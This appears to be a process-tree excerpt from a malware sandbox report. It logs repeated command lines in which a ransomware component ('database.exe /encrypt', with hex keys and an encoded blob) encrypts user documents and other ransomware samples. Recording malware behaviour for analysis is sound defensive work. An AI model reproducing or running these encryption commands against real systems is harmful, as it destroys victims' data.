C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Shade.pfi-2b703b07e6eba207d2e29360e1f5b48d2d75c0c7d927d2cce973204021188b82.exe"5⤵PID:5912
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\UDS-Trojan-Ransom.Win32.GandCrypt.a-0f7a8548525448781c3704cc6e1e7153a31d0a68bd91363b0e744b9883660556.exe"5⤵PID:5072
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\VHO-Trojan-Ransom.Win32.Blocker.gen-3e71c7978b347b083b97b0d14380576600507e2e9f7807ce6f7a8dafdad4bbe1.exe.gif"5⤵PID:1616
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\!HELP_SOS.hta"5⤵PID:6964
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\!HELP_SOS.hta.gif"5⤵PID:5888
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\5zcDe2Gk-DpTelhmT.[[email protected]].gif"5⤵PID:5764
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\6fnlIf3K-69USjuQ5.[[email protected]].gif"5⤵PID:1556
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\6uGvgh4l-SeO9dg4j.[[email protected]].gif"5⤵PID:3096
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\BackupConvert.vsx.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:5592
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\Bv4uLoER-EylLZw2W.[[email protected]].gif"5⤵PID:4588
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\CompareSync.csv.sage.gif"5⤵PID:4112
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\ConfirmApprove.mhtml.sage.gif"5⤵PID:4176
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\ConfirmSave.txt.sage.gif"5⤵PID:6928
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\CopyUnregister.csv.sage.gif"5⤵PID:5340
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:5284
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\[email protected] 1.2.0.0.id-PWMKXUEAKWFERZZJIPDAFYRRCQTEJNYWNZUY-11@7@2024 4@47@48 PM5858394.randomname-BFZAWQBHFFNLEXJPRTDKOFVKBPOOAO.SJV.cbf.sage.gif"5⤵PID:4224
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\[email protected] 1.2.0.0.id-PWMKXUEAKWFERZZJIPDAFYRRCQTEJNYWNZUY-11@7@2024 4@47@48 PM5858394.randomname-LCAMHADDGXYNDDTSOPLRHLKFDCRQGH.HCB.cbf.sage.gif"5⤵PID:2592
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\[email protected] 1.2.0.0.id-PWMKXUEAKWFERZZJIPDAFYRRCQTEJNYWNZUY-11@7@2024 4@47@48 PM5858394.randomname-MUUTVZCYKMNMQRZFJHNVGFKPTETMQL.SCV.cbf.sage.gif"5⤵PID:2272
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\InvokeReset.mpp.gif"5⤵PID:5960
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\KlOuknCx-RtShbgxB.[[email protected]].gif"5⤵PID:2696
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\PopRemove.dotx.sage.gif"5⤵PID:6032
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\README_sTlLoTpq.hta.gif"5⤵PID:3272
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\RestartResume.potm.sage.gif"5⤵PID:4148
-
-
